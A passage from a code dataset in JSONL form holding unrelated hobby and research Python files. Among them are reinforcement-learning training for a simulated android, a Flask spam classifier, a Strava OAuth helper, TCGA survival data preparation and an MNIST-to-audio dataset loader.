ActorCritic(nn.Module):\n def __init__(self, input_size, output_size, hidden_size=10, std=0.0):\n super(ActorCritic, self).__init__()\n\n self.critic = nn.Sequential(\n nn.Linear(input_size, hidden_size),\n nn.ReLU(),\n nn.Linear(hidden_size, hidden_size),\n nn.ReLU(),\n nn.Linear(hidden_size, 1)\n )\n\n self.actor = nn.Sequential(\n nn.Linear(input_size, hidden_size*2),\n nn.ReLU(),\n nn.Linear(hidden_size*2, hidden_size),\n nn.ReLU(),\n nn.Linear(hidden_size, hidden_size),\n nn.ReLU(),\n nn.Linear(hidden_size, output_size)\n )\n\n self.log_std = nn.Parameter(torch.ones(1, output_size) * std)\n self.apply(init_weights)\n\n def forward(self, x):\n value = self.critic(x)\n mu = self.actor(x)\n std = self.log_std.exp().expand_as(mu)\n dist = Normal(mu, std)\n return dist, value\n\n\nclass ExperienceDataset(Dataset):\n def __init__(self, experience):\n super(ExperienceDataset, self).__init__()\n self._exp = []\n for x in experience:\n self._exp.extend(x)\n self._length = len(self._exp)\n\n def __getitem__(self, index):\n return self._exp[index]\n\n def __len__(self):\n return self._length\n\n\ndef compute_returns(rollout, gamma=0.9):\n ret = 0\n\n for i in reversed(range(len(rollout))):\n obs, reward, action_dist, action = rollout[i]\n ret = reward + gamma * ret\n rollout[i] = (obs, reward, action_dist, action, ret)\n\n\ndef getObsVector(state, joints):\n state = np.concatenate((state[Sensors.LOCATION_SENSOR],\n state[Sensors.ORIENTATION_SENSOR],\n state[Sensors.VELOCITY_SENSOR],\n state[Sensors.PRESSURE_SENSOR],\n state[Sensors.RELATIVE_SKELETAL_POSITION_SENSOR],\n state[Sensors.JOINT_ROTATION_SENSOR][0:joints]),\n axis=None)\n return state\n\n\ndef AndroidTest(exp_name=\"exp\", lr=1e-4, env_samples=20, epochs=10,\n episode_length=500, gamma=0.99,\n start_steps=100, energy_cost_weight=0.0,\n reward_type=\"x_dist_max\", hidden_size=256, print_to_file=True):\n\n print(\"Beginning test \", exp_name)\n\n # Hyper parameters\n ppo_epochs = 4\n batch_size = 512\n epsilon = 0.2\n joints = 54\n render = False\n action_multiplier = 3\n\n env = holodeck.make('ExampleLevel', window_res=[256, 256])\n raw_state, rew, done, _ = env.reset()\n state = getObsVector(raw_state, joints)\n\n input_len = state.shape[0]\n\n model = ActorCritic(input_len, joints, hidden_size=hidden_size)\n\n val_loss_func = nn.MSELoss()\n optimizer = optim.Adam(model.parameters(), lr=lr)\n val_losses = []\n policy_losses = []\n\n episode_avg_rewards = []\n\n for e in range(epochs):\n\n experience = []\n rewards = []\n\n # Create env_samples number of episode rollouts\n for j in range(env_samples):\n\n raw_state, rew, done, _ = env.reset()\n\n for _ in range(start_steps):\n env.tick()\n\n raw_state, rew, done, _ = env.step(np.zeros(94))\n\n max_dist = raw_state[Sensors.LOCATION_SENSOR][0]\n\n state = getObsVector(raw_state, joints)\n rollout = []\n\n # Each action in an episode\n for k in range(episode_length):\n torch_state = torch.FloatTensor(state).unsqueeze(0)\n dist, val = model(torch_state)\n\n action = dist.sample().numpy()[0]\n\n obs_raw, reward, terminal, _ = env.step(action_multiplier*np.append(action, np.zeros((94-54))))\n distance = obs_raw[Sensors.LOCATION_SENSOR][0]\n\n energy_cost = np.mean(np.abs(action)) * energy_cost_weight\n\n if reward_type is \"z_dist\":\n reward = obs_raw[Sensors.LOCATION_SENSOR][2]\n elif reward_type is \"x_dist\":\n reward = obs_raw[Sensors.LOCATION_SENSOR][0]\n else:\n if distance > max_dist:\n reward = distance-max_dist\n max_dist = distance\n else:\n reward = 0\n\n reward -= energy_cost\n reward *= 10\n\n obs = getObsVector(obs_raw, joints)\n rewards.append(reward)\n\n log_prob = dist.log_prob(torch.tensor(action))\n\n rollout.append((state, reward, log_prob.detach().numpy()[0], action))\n state = obs\n\n if j is -1:\n env.render()\n\n if terminal:\n break\n\n compute_returns(rollout, gamma=gamma)\n experience.append(rollout)\n\n avg_rewards = sum(rewards) / env_samples\n episode_avg_rewards.append(avg_rewards)\n print(\"Epoch: \", e, \"/\", epochs, \" Avg Reward: \", avg_rewards)\n\n exp_data = ExperienceDataset(experience)\n exp_loader = DataLoader(exp_data, batch_size=batch_size, shuffle=True, pin_memory=True)\n\n for _ in range(ppo_epochs):\n # Train network on batches of states\n for observation, reward, old_log_prob, action, ret in exp_loader:\n optimizer.zero_grad()\n new_dist, value = model(observation.float())\n\n ret = ret.unsqueeze(1)\n\n advantage = ret.float() - value.detach()\n\n new_log_prob = new_dist.log_prob(action)\n\n r_theta = (new_log_prob - old_log_prob).exp()\n\n clipped = r_theta.clamp(1 - epsilon, 1 + epsilon)\n\n objective = torch.min(r_theta * advantage, clipped * advantage)\n\n policy_loss = -torch.mean(objective)\n val_loss = val_loss_func(ret.float(), value)\n\n loss = policy_loss + val_loss\n loss.backward()\n\n optimizer.step()\n val_losses.append(val_loss.detach().numpy())\n policy_losses.append(policy_loss.detach().numpy())\n\n if e % 10 == 0:\n model_name = 'Dec10Exp/Exp' + exp_name + str(e) + '_reward_' + str(int(avg_rewards)) + '.model'\n torch.save(model, model_name)\n\n\nif __name__ == '__main__':\n exp = int(sys.argv[1])\n\n \"\"\"\n Changes:\n Added velocity sensor and pressure sensor\n Set bias initialization to 0\n \n \n \"\"\"","sub_path":"android/android_exp2.py","file_name":"android_exp2.py","file_ext":"py","file_size_in_byte":7018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"540089046","text":"\ndef dateof():\n wet = int(input(\"enter the year of birth\\n\"))\n eet =(input(\"Press 1 if you want to check in a particular year or 2 to know the year of 100\\n\"))\n if eet=='1':\n eet = int(input(\"Enter the year you want to check\\n\"))\n print(eet-wet)\n elif eet == \"2\":\n print(f'you will 100 in {wet+100}')\n elif wet<120:\n print (120-wet)\n elif wet<1910:\n print(\"You are the Oldest Person On the Earth Show me the pic of yours with Gandhi.ji \")\n else:\n print(\"invalid entry\")\n\ndef age():\n wet = int(input(\"Enter Your Age\\n\"))\n eet = (input(\"Press 1 if you want to check in a particular year or 2 to know year of 100\\n\"))\n wwet = 2019-wet\n if eet=='1':\n eet = int(input(\"Enter the year you want to check\\n\"))\n print(eet-wwet)\n elif eet == \"2\":\n print(f'you will 100 in {wwet+100}')\n elif wet<120:\n print (120-wwet)\n elif wet>110:\n print(\"You are the Oldest Person On the Earth Show me the pic of yours with Gandhi.ji \")\n else:\n print(\"invalid entry\")\nif __name__ ==\"__main__\":\n it = int(input(\"Press 1 to Enter Age OR Press 2 to Enter Date Of Birth \\n\"))\n if it == 1:\n dateof()\n exit(0)\n else:\n age()\n exit(0)","sub_path":"Agecalculator.py","file_name":"Agecalculator.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"566407919","text":"import numpy as np\n\nN_steps = 100\nN_substeps = 10\nk_field = -0.05\n\nDt = 1.\n\nx =1e-3\nvx = 0.\n\nx_record = []\n\n#for ii in range(N_steps):\n# E = k_field*x\n# vx += E*Dt\n# x += vx*Dt\n# x_record.append(x)\n\nfor ii in range(N_steps):\n E = k_field*x\n for ssn in range(N_substeps):\n vx += E*Dt/N_substeps\n x += vx*Dt/N_substeps\n x_record.append(x)\n\nimport matplotlib.pyplot as plt\nplt.close('all')\nplt.plot(x_record)\nplt.grid(True)\nplt.show()\n\n","sub_path":"other/electron_oscillations/001_simple_euler.py","file_name":"001_simple_euler.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"274395560","text":"# Cropping in OpenCV simply utilizes array slicing in Numpy.\n\nimport argparse\n\nimport cv2\n\n\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\", \"--image\", required=True, help=\"Path to the image\")\nargs = vars(ap.parse_args())\n\nimage = cv2.imread(args[\"image\"])\ncv2.imshow(\"Original\", image)\n\n# cropping an image manually\ncropped = image[30:120, 240:335] # If used on the image trex.png this encapsulates its head\ncv2.imshow(\"Cropped image\", cropped)\n\ncv2.waitKey(0)\n","sub_path":"example_code/basic/cropping.py","file_name":"cropping.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"143603277","text":"from imctools.io.imcacquisition import ImcAcquisition\nfrom imctools.io.omeparserbase import OmeParserBase\nimport tifffile\nimport numpy as np\nimport xml.etree.ElementTree as et\nfrom imctools.io.abstractparser import AbstractParser\n\nclass OmetiffParser(AbstractParser, OmeParserBase):\n \"\"\"\n Parses an ome tiff\n\n \"\"\"\n\n def __init__(self, original_file):\n \"\"\"\n\n :param filename:\n \"\"\"\n #self._data = None\n #self._ome = None\n AbstractParser.__init__(self)\n self.read_image(original_file)\n self.filename = original_file\n self.n_acquisitions = 1\n OmeParserBase.__init__(self, self.data, self.ome, origin='ome.tiff')\n\n def get_imc_acquisition(self):\n \"\"\"\n Get Imc Acquisition object\n\n :return:\n \"\"\"\n meta = self.meta_dict\n return ImcAcquisition(meta['image_ID'], self.original_file,\n self.data,\n meta['channel_metals'],\n meta['channel_labels'],\n original_metadata=self.ome ,\n image_description=None,\n origin=self.origin,\n offset=0)\n\n def read_image(self, filename):\n with tifffile.TiffFile(filename) as tif:\n try:\n self.data = tif.asarray(out='memmap')\n except:\n # this is in an older tifffile version is used\n self.data = tif.asarray()\n try:\n self.ome = tif.pages[0].tags['ImageDescription'].value\n except:\n self.ome = tif.pages[0].tags['image_description'].value\n\n\n\n # @staticmethod\n # def reshape_flat(data):\n # \"\"\"\n # Reshape the image data into the flat format.\n # :param data:\n # :return:\n # \"\"\"\n # print(data[0,0,:5])\n # c, y, x = data.shape\n # h = x * y\n # data = np.reshape(data.ravel(order='C'),(h, c), order='F')\n # data = np.hstack((np.tile(np.arange(x),y).reshape((h,1)),\n # np.repeat(np.arange(y),x).reshape((h,1)),\n # (np.arange(h)+1).reshape((h, 1)),\n # data))\n # return data\n\nif __name__ == '__main__':\n fn = '/home/vitoz/temp/HIER_healthy_4_3_HIER5_4.ome.tiff'\n parser = OmetiffParser(fn)\n imc_ac = parser.get_imc_acquisition()\n import matplotlib.pyplot as plt\n plt.figure()\n dat = np.array(imc_ac.get_img_stack_cyx([0])).squeeze()\n plt.imshow(np.array(imc_ac.get_img_stack_cyx([0])).squeeze())\n plt.show()\n print(imc_ac)\n print(imc_ac.channel_metals)\n","sub_path":"imctools/io/ometiffparser.py","file_name":"ometiffparser.py","file_ext":"py","file_size_in_byte":2711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"45906905","text":"# Copyright (c) 2015–2016 Molly White\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\nimport config\nimport os\nimport pickle\nimport re\nimport smtplib\nfrom datetime import date\n\n__location__ = os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__)))\n\n\ndef get_state():\n \"\"\"Get stored state information.\"\"\"\n try:\n with open('state.pickle', 'rb') as f:\n state = pickle.load(f)\n except IOError:\n state = {\"logs\": {},\n \"latest_links\": []}\n return state\n\n\ndef save_state(state):\n \"\"\"Pickle the state dictionary.\"\"\"\n with open('state.pickle', 'wb') as f:\n pickle.dump(state, f, pickle.HIGHEST_PROTOCOL)\n\n\ndef split_file(file, state):\n \"\"\"Grab only the chunk of the file that was updated since the last runthrough, and record the\n timestamp of the last line in the file.\"\"\"\n # Read in the entire logfile\n with open(file, 'r', encoding='utf-8', errors='replace') as f:\n full_log = f.read()\n\n # Get only the entries from after the last runthrough\n if file in state[\"logs\"]:\n last_parsed = state[\"logs\"][file]\n ind = full_log.rfind(\"\\n\" + last_parsed)\n log = full_log[ind:]\n else:\n log = full_log\n\n # Get the last timestamp in the file to store in the state\n last_line = full_log.splitlines()[-1]\n m = re.match(r'\\d{2}/\\d{2}/\\d{2} \\d{2}:\\d{2}', last_line)\n if m:\n state[\"logs\"][file] = m.group(0)\n\n return log, state\n\n\ndef find_links(log, filename):\n \"\"\"Pull out links from the log.\"\"\"\n links = []\n verbose_links = []\n log_lines = log.splitlines()\n for ind, line in enumerate(log_lines):\n if \"http\" in line:\n m = re.search(r'(http.*?)(?:\\s|\\Z)', log_lines[ind])\n if m:\n if m.group(1) not in config.link_blacklist:\n links.append(m.group(1))\n if 2 < ind < len(log_lines) - 5:\n verbose_links.append(\"\\n\".join([filename] + log_lines[ind - 2:ind + 5]))\n else:\n verbose_links.append(log_lines[ind])\n return links, verbose_links\n\n\ndef email_links(links):\n \"\"\"Send an email with the links from this run.\"\"\"\n today = date.today().strftime(\"%b %0d\")\n body = \"\\n\\n\".join(links) if links else \"No new links today!\"\n message = \"From: {0}\\nTo: {1}\\nSubject: Feminist rage links of the day for {2}\\n\\n{3}\"\\\n .format(config.from_email, \",\".join(config.to_email), today, body)\n message = message.encode(\"ascii\", \"replace\")\n\n server = smtplib.SMTP('smtp.gmail.com:587')\n server.ehlo()\n server.starttls()\n server.login(config.smtp_login, config.smtp_password)\n server.sendmail(config.from_email, config.to_email, message)\n server.quit()\n\n\ndef run():\n \"\"\"Run through the logfiles and pull out the links since the last pass through.\"\"\"\n links = []\n verbose_links = []\n state = get_state()\n for file in config.files:\n log, state = split_file(file, state)\n new_links, new_verbose_links = find_links(log, file)\n links += new_links\n verbose_links += new_verbose_links\n state[\"latest_links\"] += links\n email_links(verbose_links)\n save_state(state)\n print(\"Email sent; links recorded.\")\n\n\nif __name__ == \"__main__\":\n run()\n","sub_path":"link_finder.py","file_name":"link_finder.py","file_ext":"py","file_size_in_byte":4317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"148479141","text":"from PIL import Image\nimport numpy\nimport os\n\ndef problem1():\n img_src = Image.open(\"mars.png\")\n img_src.save(\"result/mars1.png\")\n\ndef problem2():\n img_src = Image.new('RGB', (128, 128), (255, 255, 255))\n img_mat = numpy.array(img_src)\n for i in range(img_mat.shape[0]):\n img_mat[i,i] = [0, 0, 0]\n img = Image.fromarray(img_mat)\n img.save(\"result/p1.png\")\n\ndef problem3():\n img_src = Image.open(\"mars.png\")\n img_src = img_src.point(lambda i: 255*((float(i)/255)**(1/2.2)))\n img_src.save(\"result/q3.png\")\n\ndef test():\n img1 = Image.open('mars.png')\n img2 = Image.open('result/q3.png')\n img1_mat = numpy.array(img1)\n img2_mat = numpy.array(img2)\n\n\ndef day1_run():\n problem1()\n problem2()\n problem3()\n\nif __name__ == '__main__':\n try:\n os.mkdir('result')\n except FileExistsError:\n print('Dir exist!')\n day1_run()\n \n\n","sub_path":"day1/day1.py","file_name":"day1.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"549729925","text":"# import numpy as np\r\nfrom flask import Flask, request, jsonify, render_template\r\nfrom sklearn.pipeline import Pipeline\r\nimport pickle\r\n\r\napp = Flask(__name__,static_url_path='/templates/',static_folder='templates')\r\nmodel = pickle.load(open('C:\\\\Users\\\\Aniket Ratnaparakhi\\\\PycharmProjects\\\\SMS_SPAM_NEW\\\\finalized_model.pkl', 'rb'))\r\n\r\n@app.route('/')\r\ndef home():\r\n return render_template('index1.html')\r\n\r\n@app.route('/predict',methods=['POST'])\r\ndef predict():\r\n\r\n final_feature = request.form.values()\r\n prediction = model.predict(final_feature)\r\n result = ['WAIT A MINUTE, This IS A SPAM!', 'OHHH, THIS IS A NORMAL MESSAGE.']\r\n # output = (prediction[0], 2)\r\n # def pre():\r\n if prediction:\r\n out=result[0]\r\n else:\r\n out=result[1]\r\n\r\n return render_template('index1.html', prediction_text=out)\r\n\r\n@app.route('/results',methods=['POST'])\r\ndef results():\r\n\r\n data = str(request.get_json(force=True))\r\n # prediction = model.predict(data.get())\r\n prediction = model.predict(data['msg'])\r\n output = prediction\r\n return jsonify(output)\r\n# @app.route(\"/profile/\")\r\n# def profile(name):\r\n# return render_template(\"test.html\", name=name)\r\n\r\nif __name__ == \"__main__\":\r\n app.run(debug=True,port=5000)\r\n # from waitress import serve\r\n # serve(app, host=\"0.0.0.0\", port=5000)","sub_path":"main_new.py","file_name":"main_new.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"475097720","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n # Author : Gyeongjae Choi\n # Github : https://github.com/ryanking13\n # Python Version : 3.5.2\n \n This program encodes string to gray-scale image using by ascii value\n\n ### Inspired by Python Challenge (www.pythonchallenge.com) Level7 ###\n\"\"\"\n\nfrom PIL import Image\nimport optparse\nimport math\nimport re\n\n# parse options\ndef parse():\n parser = optparse.OptionParser(\"Usage : \" + \"-s '' or -f \")\n parser.add_option('-s', dest='str', type='string', help='specify the string to encode')\n parser.add_option('-f', dest='str_file', type='string', help='specify the file that string is written')\n\n (options, args) = parser.parse_args()\n\n if (options.str is None) & (options.str_file is None):\n print(parser.usage)\n exit(0)\n\n elif (options.str is not None) & (options.str_file is not None):\n print(\"[-] To many options, please use only ONE option.\")\n exit(0)\n\n elif options.str is not None:\n return options.str.strip('\\'') # in order for the consistency\n\n else:\n return open(options.str_file, 'r', encoding='utf-8-sig').read()\n\n\n# Not Used for Now\ndef find_max_divisor(num):\n\n border = int(math.sqrt(num)) + 1\n\n for i in range(border, 1, -1):\n if num % i == 0:\n return i\n\n return num\n\n\ndef main():\n string = parse()\n length = len(string)\n block_size = 20\n\n x_num = 30\n y_num = length // x_num\n if length % x_num != 0:\n y_num += 1\n leftover = x_num * y_num - length\n\n img = Image.new('RGB', (x_num*block_size, y_num*block_size))\n px = img.load()\n\n for i in range(length):\n x_st = i % x_num\n y_st = i // x_num\n color = ord(string[i])\n if color > 255: # some out of ascii values\n color = 32 # empty\n\n for x in range(block_size):\n for y in range(block_size):\n px[x_st*block_size + x, y_st*block_size + y] = (color, color, color)\n\n for i in range(leftover):\n x_st = x_num - leftover + i;\n y_st = y_num - 1\n color = 32 # empty\n\n for x in range(block_size):\n for y in range(block_size):\n px[x_st*block_size + x, y_st*block_size + y] = (color, color, color)\n\n img.save('saved.jpg')\n\n\nif __name__ == '__main__':\n main()","sub_path":"text-to-gray-scale/encoder.py","file_name":"encoder.py","file_ext":"py","file_size_in_byte":2351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"170917294","text":"import stravalib\nimport http.server as BaseHTTPServer\nimport urllib.parse as urlparse\nimport webbrowser\nimport sys\nimport json\n\nclass MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):\n #Handle the web data sent from the strava API\n def do_HEAD(self):\n return self.do_GET()\n\n def do_GET(self):\n #Get the API code for Strava\n # self.wfile.write(b'')\n code = urlparse.parse_qs(urlparse.urlparse(self.path).query)['code'][0]\n # Login to the API\n token = useCode(code)\n # Create page\n self.send_response(200)\n self.send_header(b\"Content-type\", \"text/html\")\n self.end_headers()\n self.wfile.write(b\"Token received\")\n self.wfile.write(bytes(\"

Received and saved access token %s

\" % str(token['access_token']), \"utf-8\"))\n self.wfile.write(b\"\")\n return self.save_token(token)\n\n def save_token(self, token):\n with open(r'tokens\\user_access.token', 'w') as file:\n file.write(json.dumps(token))\ndef useCode(code):\n # Put your data in file 'tokens/client.token' and separate the fields with a comma: clientid,clientsecrettoken\n with open(r'tokens\\client.token', 'r') as file:\n client_secret = file.read().split(',')\n client_id, secret = client_secret[0], client_secret[1]\n client = stravalib.client.Client()\n #Retrieve the login code from the Strava server\n access_token = client.exchange_code_for_token(client_id=client_id,\n client_secret=secret, code=code)\n return access_token\n\ndef authorize():\n port = 8008\n url = 'http://localhost:%d/authorization' % port\n\n #Create the strava client, and open the web browser for authentication\n client = stravalib.client.Client()\n authorize_url = client.authorization_url(client_id=28605,\n redirect_uri=url,\n approval_prompt='auto',\n scope='activity:read_all')\n print('Opening: %s' % authorize_url)\n webbrowser.open(authorize_url)\n try:\n httpd = BaseHTTPServer.HTTPServer(('localhost', port), MyHandler)\n httpd.handle_request()\n except KeyboardInterrupt:\n # Allow ^C to interrupt from any thread.\n sys.stdout.write('\\033[0m')\n sys.stdout.write('User Interupt\\n')\ndef save_token(token):\n with open(r'tokens\\user_access.token', 'w') as file:\n file.write(json.dumps(token))\n\ndef refresh(refresh_token):\n client = stravalib.client.Client()\n with open(r'tokens\\client.token', 'r') as file:\n client_secret = file.read().split(',')\n client_id, secret = client_secret[0], client_secret[1]\n token = client.refresh_access_token(client_id,secret,refresh_token)\n save_token(token)\n return token\n\n","sub_path":"tools/authorization.py","file_name":"authorization.py","file_ext":"py","file_size_in_byte":2854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"591114444","text":"import json\nimport re\n\n\npattern = r'==.*=='\nre_pattern = re.compile(pattern)\nsection_delimiter = '='\n\n\ndef main():\n with open('england.json', 'r') as f:\n j_dic = json.loads(f.read())\n for line in j_dic['text'].split('\\n'):\n if re_pattern.match(line.lower()):\n print(f'level : {line.count(section_delimiter)/2 - 1} / section : [{line.replace(\"=\", \"\")}]')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"chapter_3/23.py","file_name":"23.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"635684796","text":"from argparse import ArgumentParser\n\nparser = ArgumentParser(description='')\nparser.add_argument(['-c', '--continue'], metavar='path to save file', type=str, nargs='1',\n help='path to save file to continue', default=None)\nparser.add_argument(['-p', '--provision'], metavar='provision as float', type=float, nargs='1',\n help='path to save file to continue', default=0.05)\n\nargs = parser.parse_args()\n\n#add shutdown hook for saving\n\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"582691797","text":"# tcga_pre_gbm_survival.py\r\n# Prepare GBM survival rate data: tcga_gbm_survival.txt\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nfrom os import listdir\r\nfrom os.path import isfile, join\r\nimport math\r\n\r\npath1 = 'rawdata/tcga_gbm/gdac.broadinstitute.org_GBM.Mutation_Packager_Oncotated_Calls.Level_3.2016012800.0.0/'\r\nfiles = [f for f in listdir(path1) if isfile(join(path1, f))]\r\nfiles.remove('MANIFEST.txt')\r\npat2mut = {}\r\nfor fl in files:\r\n f = open(path1+fl,'r')\r\n pat = fl.split('.')[0][:12].lower()\r\n # first 4 lines not useful\r\n for _ in range(4): next(f)\r\n pat2mut[pat] = set()\r\n for line in f:\r\n mut = line.strip().split('\\t')[0].lower()\r\n pat2mut[pat].add(mut)\r\n f.close()\r\n\r\n# vital status of some patients not available.\r\nsv = pd.read_csv('rawdata/tcga_gbm/tcga_gbm_survival_mid.txt',sep='\\t')\r\n# 0: status; 1: days_to_death; 2: days_to_last_followup; 3: days_to_birth.\r\n\r\n# set of patients that have both mutation data and survival data.\r\nsetpat = set()\r\n# set of mutations that exists in the dataset we use.\r\nsetmut = set()\r\nf = open('inputdata/tcga_gbm_survival.txt','w')\r\nprint >> f, 'pat\\tage\\tstatus\\ttime'\r\nfor pat in pat2mut.keys():\r\n # only mutation data available\r\n if pat not in sv.keys(): continue\r\n patc = sv[pat]\r\n if patc[0] == 'dead':\r\n time = float(patc[1])\r\n status = '1'\r\n elif patc[0] == 'alive':\r\n time = float(patc[2])\r\n status = '0'\r\n # status not available\r\n else: continue\r\n # both time not available\r\n if math.isnan(time): continue\r\n age = int(-1.0*float(patc[3])/365.24)\r\n print >> f, pat+'\\t'+str(age)+'\\t'+status+'\\t'+str(time)\r\n setpat.add(pat)\r\n setmut = setmut | pat2mut[pat]\r\nf.close()\r\nsetmut = sorted(list(setmut))\r\n\r\n\r\nf = open('inputdata/tcga_gbm_setmut.txt', 'w')\r\nprint >> f, '\\n'.join(setmut)\r\nf.close()\r\n# stat: 9,621 mutations in total.\r\n\r\nf = open('inputdata/tcga_gbm_pat2mut.txt', 'w')\r\nfor pat in setpat:\r\n print >> f, pat+'\\t'+'\\t'.join(list(pat2mut[pat]))\r\nf.close()\r\n# stat: 284 pat, 225 dead, 59 alive.\r\n# 1: dead; 0: alive.\r\n\r\n#EOF.\r\n","sub_path":"charge/tcga/tcga_pre_gbm_survival.py","file_name":"tcga_pre_gbm_survival.py","file_ext":"py","file_size_in_byte":2065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"198217676","text":"# spacy.explain('')\n\n#\n# import spacy\n# nlp = spacy.load(\"en_core_web_sm\")\n# doc = nlp(u\"This is a sentence.\")\n# print([(w.text, w.pos_) for w in doc])\n\nimport spacy\n# spacy.explain('pos)\n\nnlp = spacy.load(\"en_core_web_sm\")\n\ntext = \"I'm going to be visiting Japan this summer with family\"\n\ntext2 = \"I'm going to be doing an internship this summer\"\n\n# Process the text\ndoc = nlp(text)\n\nfor chunk in doc.noun_chunks:\n print(chunk.text, chunk.root.text, chunk.root.dep_,\n chunk.root.head.text)\n\n# for token in doc:\n# # Get the token text, part-of-speech tag and dependency label\n# token_text = token.text\n# token_pos = token.pos_\n# token_dep = token.dep_\n# # This is for formatting only\n# print(\"{:<12}{:<10}{:<10}\".format(token_text, token_pos, token_dep))","sub_path":"backend/old_and_test_files/jacob-tries-spacy.py","file_name":"jacob-tries-spacy.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"18133165","text":"from __future__ import print_function\nfrom PIL import Image\nimport os\nimport pdb\nimport torch\nimport os.path\nimport numpy as np\nimport sys\nif sys.version_info[0] == 2:\n import cPickle as pickle\nelse:\n import pickle\n\nimport torch.utils.data as data\nfrom audioVoiceMat import extract_sound_from_voice\nfrom vggish_input import *\n\nimport matplotlib.pyplot as plt\n\nclass MNIST(data.Dataset):\n \"\"\"`MNIST `_ Dataset.\n Args:\n root (string): Root directory of dataset where ``processed/training.pt``\n and ``processed/test.pt`` exist.\n train (bool, optional): If True, creates dataset from ``training.pt``,\n otherwise from ``test.pt``.\n download (bool, optional): If true, downloads the dataset from the internet and\n puts it in root directory. If dataset is already downloaded, it is not\n downloaded again.\n transform (callable, optional): A function/transform that takes in an PIL image\n and returns a transformed version. E.g, ``transforms.RandomCrop``\n target_transform (callable, optional): A function/transform that takes in the\n target and transforms it.\n \"\"\"\n urls = [\n 'http://yann.lecun.com/exdb/mnist/train-images-idx3-ubyte.gz',\n 'http://yann.lecun.com/exdb/mnist/train-labels-idx1-ubyte.gz',\n 'http://yann.lecun.com/exdb/mnist/t10k-images-idx3-ubyte.gz',\n 'http://yann.lecun.com/exdb/mnist/t10k-labels-idx1-ubyte.gz',\n ]\n training_file = 'training.pt'\n test_file = 'test.pt'\n classes = ['0 - zero', '1 - one', '2 - two', '3 - three', '4 - four',\n '5 - five', '6 - six', '7 - seven', '8 - eight', '9 - nine']\n\n def __init__(self, root, train=True, transform=None, target_transform=None):\n self.root = os.path.expanduser(root)\n self.transform = transform\n self.target_transform = target_transform\n self.train = train # training set or test set\n\n if not self._check_exists():\n raise RuntimeError('Dataset not found.' +\n ' You can use download=True to download it')\n\n if self.train:\n data_file = self.training_file\n else:\n data_file = self.test_file\n self.data, self.targets = torch.load(os.path.join(self.processed_folder, data_file))\n\n def __getitem__(self, index):\n \"\"\"\n Args:\n index (int): Index\n Returns:\n tuple: (image, target) where target is index of the target class.\n \"\"\"\n img, target = self.data[index], int(self.targets[index])\n\n img = np.array(img)\n sound = np.array(extract_sound_from_voice(img))\n feat = waveform_to_examples(sound, 22050).astype('float32')\n\n return feat, target\n\n def debug_getitem__(self, index=100):\n \"\"\"\n Args:\n index (int): Index\n Returns:\n tuple: (image, target) where target is index of the target class.\n \"\"\"\n img, target = self.data[index], int(self.targets[index])\n img = np.array(img)\n pdb.set_trace()\n sound = np.array(extract_sound_from_voice(img))\n feat = waveform_to_examples(sound, 22050).astype('float32')\n\n return feat, target\n\n def __len__(self):\n return len(self.data)\n\n @property\n def raw_folder(self):\n return os.path.join(self.root, 'raw')\n\n @property\n def processed_folder(self):\n return os.path.join(self.root, 'processed')\n\n @property\n def class_to_idx(self):\n return {_class: i for i, _class in enumerate(self.classes)}\n\n def _check_exists(self):\n # pdb.set_trace()\n return os.path.exists(os.path.join(self.processed_folder, self.training_file)) and \\\n os.path.exists(os.path.join(self.processed_folder, self.test_file))\n\nif __name__ == '__main__':\n trainset = MNIST(root='/mount/wd/data/mnist', train=True)\n x,y = 